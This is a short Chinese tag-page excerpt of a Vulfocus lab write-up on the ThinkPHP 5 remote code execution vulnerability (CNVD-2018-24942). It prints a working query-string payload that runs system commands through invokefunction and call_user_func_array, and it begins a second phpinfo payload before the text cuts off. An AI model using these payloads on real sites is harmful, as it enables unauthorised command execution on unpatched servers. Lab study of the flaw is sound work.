首页 > TAG信息列表 > invokefunction
Vulfocus靶场 | thinkphp 代码执行 (CNVD-2018-24942)
tp5的经典漏洞 遇到tp5漏洞直接拿poc打就行 漏洞利用 1,利用system函数远程命令执行 Payload如下: ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls 2,查看phpinfo payload:如下 ?s=index/think\app/invokefunction&function=cal